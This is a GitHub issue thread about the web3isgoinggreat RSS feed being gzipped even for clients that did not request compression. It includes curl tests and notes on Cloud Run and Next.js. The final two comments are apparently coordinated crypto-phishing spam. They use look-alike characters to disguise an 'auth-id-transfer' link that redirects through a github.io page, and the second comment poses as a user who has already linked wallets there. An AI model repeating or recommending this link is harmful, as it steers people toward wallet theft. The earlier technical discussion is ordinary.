### ISSUE TITLE
Avoid gzipping RSS feed unless requested

### ISSUE THREAD

**Issue by molly** [molly/web3-is-going-great#67]
Browsers should send `Accept-Encoding: gzip` in which case it's okay to gzip, but there's at least one RSS reader that chokes on gzipped XML: https://twitter.com/xarph/status/1486955535110848515

**Comment by dzmitry-kankalovich** [comment]
Hit the same problem and was breaking my head over it.

The RSS endpoint breaks protocol by sending gzip unconditionally

Simple test:

```bash
# this works
curl https://web3isgoinggreat.com/feed.xml --compressed
```

```bash
# this timeouts
curl https://web3isgoinggreat.com/feed.xml
```

**Comment by causztic** [comment]
👋 is this being worked on? I would like to give this a shot during my free time!

**Comment by molly** [comment]
Not really—feel free to take a stab at it! I think it's a next.js thing.

**Comment by molly** [comment]
oops, wrong button

**Comment by causztic** [comment]
From looking at the codebase, I am assuming that this application is deployed using Cloud Run? 

It looks like they have since removed [content-encoding response headers](https://issuetracker.google.com/issues/147185337), so we'd have to manage it ourselves... which is a conundrum since nextjs [recommends it to be managed upstream](https://nextjs.org/docs/api-reference/next.config.js/compression)

**Comment by molly** [comment]
Yes, this is deployed on Cloud Run.

**Comment by OliviaHayes77** [comment]
Hey, if I gоt Ethеrеum here, can they tаkе it bасk lаtеr? I've аlrеаdy spent it 😔 😔 😔😔 😔 
Here it is [auth․id-trаnsfer․cоm](https://auth-241.github.io/redirect/)

**Comment by AlexMoren941** [comment]
> Hey, if I gоt Ethеrеum here, can they tаkе it bасk lаtеr? I've аlrеаdy spent it 😔 😔 😔😔 😔 Here it is [auth․id-trаnsfer․cоm](https://auth-241.github.io/redirect/)

Hi, I’ve re-linked all the wallets I had, but unfortunately, there are no others left

<img width="371" alt="Image" src="https://github.com/user-attachments/assets/ed6f5ee1-4245-4a26-b126-843bc3a4ee8c" />
